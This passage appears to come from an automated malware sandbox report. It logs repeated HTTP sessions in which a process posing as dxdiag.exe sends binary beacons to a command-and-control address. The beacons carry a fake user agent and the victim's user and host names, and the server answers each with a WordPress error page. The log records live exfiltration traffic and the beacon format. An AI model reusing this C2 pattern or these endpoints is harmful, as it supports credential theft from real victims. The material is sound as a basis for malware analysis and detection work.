                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                              Oct 1, 2024 07:50:42.285963058 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                              Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                              Oct 1, 2024 07:50:42.285974026 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                              Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                              Oct 1, 2024 07:50:42.286531925 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                              Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              9192.168.2.565322137.184.191.215801900C:\Windows\SysWOW64\dxdiag.exe
                              TimestampBytes transferredDirectionData
                              Oct 1, 2024 07:50:42.437017918 CEST243OUTPOST /index.php/10899 HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 137.184.191.215
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F612A844
                              Content-Length: 153
                              Connection: close
                              Oct 1, 2024 07:50:42.441873074 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                              Data Ascii: (ckav.rualfons960781ALFONS-PC0FDD42EE188E931437F4FBE2C
                              Oct 1, 2024 07:50:45.008578062 CEST1236INHTTP/1.0 500 Internal Server Error
                              Date: Tue, 01 Oct 2024 05:50:42 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                              Cache-Control: no-cache, must-revalidate, max-age=0
                              Content-Length: 2557
                              Connection: close
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                              Oct 1, 2024 07:50:45.008778095 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                              Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                              Oct 1, 2024 07:50:45.008797884 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                              Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              10192.168.2.565323137.184.191.215801900C:\Windows\SysWOW64\dxdiag.exe
                              TimestampBytes transferredDirectionData
                              Oct 1, 2024 07:50:45.171783924 CEST243OUTPOST /index.php/10899 HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 137.184.191.215
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F612A844
                              Content-Length: 153
                              Connection: close
                              Oct 1, 2024 07:50:45.176865101 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                              Data Ascii: (ckav.rualfons960781ALFONS-PC0FDD42EE188E931437F4FBE2C
                              Oct 1, 2024 07:50:47.717386007 CEST1236INHTTP/1.0 500 Internal Server Error
                              Date: Tue, 01 Oct 2024 05:50:45 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                              Cache-Control: no-cache, must-revalidate, max-age=0
                              Content-Length: 2557
                              Connection: close
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                              Oct 1, 2024 07:50:47.717595100 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                              Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                              Oct 1, 2024 07:50:47.717607975 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                              Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              11192.168.2.565324137.184.191.215801900C:\Windows\SysWOW64\dxdiag.exe
                              TimestampBytes transferredDirectionData
                              Oct 1, 2024 07:50:47.876611948 CEST243OUTPOST /index.php/10899 HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 137.184.191.215
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F612A844
                              Content-Length: 153
                              Connection: close
                              Oct 1, 2024 07:50:47.882333040 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                              Data Ascii: (ckav.rualfons960781ALFONS-PC0FDD42EE188E931437F4FBE2C
                              Oct 1, 2024 07:50:50.529068947 CEST1236INHTTP/1.0 500 Internal Server Error
                              Date: Tue, 01 Oct 2024 05:50:48 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                              Cache-Control: no-cache, must-revalidate, max-age=0
                              Content-Length: 2557
                              Connection: close
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                              Oct 1, 2024 07:50:50.529227972 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                              Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                              Oct 1, 2024 07:50:50.529246092 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                              Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              12192.168.2.565325137.184.191.215801900C:\Windows\SysWOW64\dxdiag.exe
                              TimestampBytes transferredDirectionData
                              Oct 1, 2024 07:50:50.686917067 CEST243OUTPOST /index.php/10899 HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 137.184.191.215
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F612A844
                              Content-Length: 153
                              Connection: close
                              Oct 1, 2024 07:50:50.691800117 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                              Data Ascii: (ckav.rualfons960781ALFONS-PC0FDD42EE188E931437F4FBE2C
                              Oct 1, 2024 07:50:53.298724890 CEST1236INHTTP/1.0 500 Internal Server Error
                              Date: Tue, 01 Oct 2024 05:50:51 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                              Cache-Control: no-cache, must-revalidate, max-age=0
                              Content-Length: 2557
                              Connection: close
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                              Oct 1, 2024 07:50:53.298980951 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                              Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                              Oct 1, 2024 07:50:53.298995972 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                              Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                              Oct 1, 2024 07:50:53.299514055 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                              Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              13192.168.2.565326137.184.191.215801900C:\Windows\SysWOW64\dxdiag.exe
                              TimestampBytes transferredDirectionData
                              Oct 1, 2024 07:50:53.817203999 CEST243OUTPOST /index.php/10899 HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 137.184.191.215
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F612A844
                              Content-Length: 153
                              Connection: close
                              Oct 1, 2024 07:50:53.822128057 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                              Data Ascii: (ckav.rualfons960781ALFONS-PC0FDD42EE188E931437F4FBE2C
                              Oct 1, 2024 07:50:56.410825014 CEST1236INHTTP/1.0 500 Internal Server Error
                              Date: Tue, 01 Oct 2024 05:50:54 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                              Cache-Control: no-cache, must-revalidate, max-age=0
                              Content-Length: 2557
                              Connection: close
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                              Oct 1, 2024 07:50:56.411010027 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                              Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                              Oct 1, 2024 07:50:56.411020041 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                              Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                              Oct 1, 2024 07:50:56.411576033 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                              Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
